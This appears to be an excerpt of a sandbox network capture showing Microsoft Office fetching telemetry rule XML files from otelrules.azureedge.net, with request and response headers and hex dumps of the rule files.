                                                          2024-12-02 16:56:48 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          108192.168.2.44986613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:48 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:48 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:48 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1389
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                          ETag: "0x8DC582BE10A6BC1"
                                                          x-ms-request-id: ca68633c-201e-006e-1f8a-3fbbe3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165648Z-174f7845968kvnqxhC1EWRmf3g0000000rhg000000009q0q
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:48 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          109192.168.2.44986713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:48 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:49 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:49 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1352
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                          ETag: "0x8DC582BE9DEEE28"
                                                          x-ms-request-id: 717d5930-e01e-001f-2a2b-441633000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165649Z-174f7845968n2hr8hC1EWR9cag00000014cg0000000092n8
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:49 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          110192.168.2.44986813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:49 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:49 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:49 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1405
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                          ETag: "0x8DC582BE12B5C71"
                                                          x-ms-request-id: 44636861-901e-0083-5170-43bb55000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165649Z-174f7845968jrjrxhC1EWRmmrs00000014y00000000037yq
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:49 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          111192.168.2.44986913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:50 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:50 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:50 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1368
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                          ETag: "0x8DC582BDDC22447"
                                                          x-ms-request-id: 14abde1b-801e-0047-6aab-437265000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165650Z-174f7845968vqt9xhC1EWRgten00000014vg000000001ppm
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:50 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          112192.168.2.44987113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:50 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:51 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:50 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1364
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                          ETag: "0x8DC582BE1223606"
                                                          x-ms-request-id: 8c7215b7-001e-00ad-4224-44554b000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165650Z-174f7845968n2hr8hC1EWR9cag000000148000000000vx26
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:51 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          113192.168.2.44987013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:50 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:51 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:50 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1401
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                          ETag: "0x8DC582BE055B528"
                                                          x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165650Z-174f7845968glpgnhC1EWR7uec00000014rg00000000zx8e
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:51 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          114192.168.2.44987213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:51 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:51 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:51 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1397
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                          ETag: "0x8DC582BE7262739"
                                                          x-ms-request-id: f24b5158-501e-0047-6a59-43ce6c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165651Z-174f7845968xlwnmhC1EWR0sv800000014h000000000g7pr
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:51 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          115192.168.2.44987313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:51 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:52 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:51 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1360
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                          ETag: "0x8DC582BDDEB5124"
                                                          x-ms-request-id: bdb61e3c-f01e-0099-1ac7-439171000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165651Z-174f7845968nxc96hC1EWRspw800000014d000000000mb7c
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:52 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          116192.168.2.44987413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:52 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:53 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:52 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1403
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                          ETag: "0x8DC582BDCB4853F"
                                                          x-ms-request-id: 39707a40-001e-00a2-1737-43d4d5000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165652Z-174f7845968qj8jrhC1EWRh41s00000014kg00000000r38r
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:53 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          117192.168.2.44987613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:52 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:53 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1397
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                          ETag: "0x8DC582BDFD43C07"
                                                          x-ms-request-id: 709a1193-501e-00a3-3559-43c0f2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165653Z-174f7845968swgbqhC1EWRmnb400000014ug00000000k31m
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:53 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          118192.168.2.44987513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:52 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:53 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1366
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                          ETag: "0x8DC582BDB779FC3"
                                                          x-ms-request-id: fde36bdf-c01e-000b-1591-3fe255000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165653Z-174f7845968xr5c2hC1EWRd0hn0000000pp0000000002m7v
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
